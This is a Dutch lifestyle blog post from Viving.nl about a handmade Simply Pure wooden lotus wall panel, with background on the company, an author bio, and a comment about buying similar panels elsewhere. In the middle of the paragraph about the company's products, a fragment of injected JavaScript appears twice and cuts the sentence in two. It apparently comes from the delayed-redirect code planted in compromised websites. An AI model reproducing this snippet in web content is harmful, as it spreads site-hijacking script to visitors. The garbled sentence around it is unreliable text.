Simply Pure Wanddecoratie

Dit houten wandpaneel staat echt al een behoorlijke tijd om mijn verlanglijst! Ik heb de collectie van Simply Pure in diverse woonbladen gezien en vorig jaar ook op de VT-Wonen beurs in de RAI in Amsterdam, maar het blijft een echte musthave! Nog even doorsparen dan maar…

Over Simply Pure

Simply Pure heeft een verzameling van handgemaakte producten van natuurlijke materialen en tinten uit verschillende delen van de wereld. Eigenaresse Britta von Wedel droomde van een bedrijf waarmee ze meer zin aan haar leven kon geven. Vooral de combinatie van duurzaam, sociaal en commercie zijn de perfecte combinatie voor haar bedrijf. Ze startte met de prachtige houten lotus wandpanelen uit Thailand en in de loop van tijd zijn hier ook andere producten aan dom() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}dom()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}toegevoegd zoals vloervazen, nachtkastjes en tafellampen. Allemaal handgemaakte en duurzame producten met een tijdloos design.

 

Anouk - Viving.nl

De website Viving is opgezet door Anouk (28 jaar). In mijn vrije tijd besteed ik veel tijd aan het inrichten van het huis en werk ik graag in de tuin. Daarnaast ben ik dol op lekker eten en drinken. Ik sta dan ook vaak in de keuken om voor familie en vrienden te koken. Als ik in huis bezig ben dan kan ik me heerlijk ontspannen en alle inspiratie die ik hierbij op doe wil ik graag met jullie delen op deze website.

1 Reactie op "Simply Pure Wanddecoratie"

  • Anouk - Viving.nl
    Anouk - Viving.nl 19 januari 2017 (15:41)

    Hij is eindelijk binnen!
    Maison du Monde heeft tal leuke meubels en decoratie-accessoires en ik heb goed nieuws. Naast de winkels in Frankrijk en België, hebben ze ook een Nederlandse webshop. Ik scoorde daar drie wandpanelen met een totale afmeting van 1,50 x 1,50 voor een mooie prijs. Ik ben blij!

Plaats een reactie:

Je emailadres wordt niet weergegeven.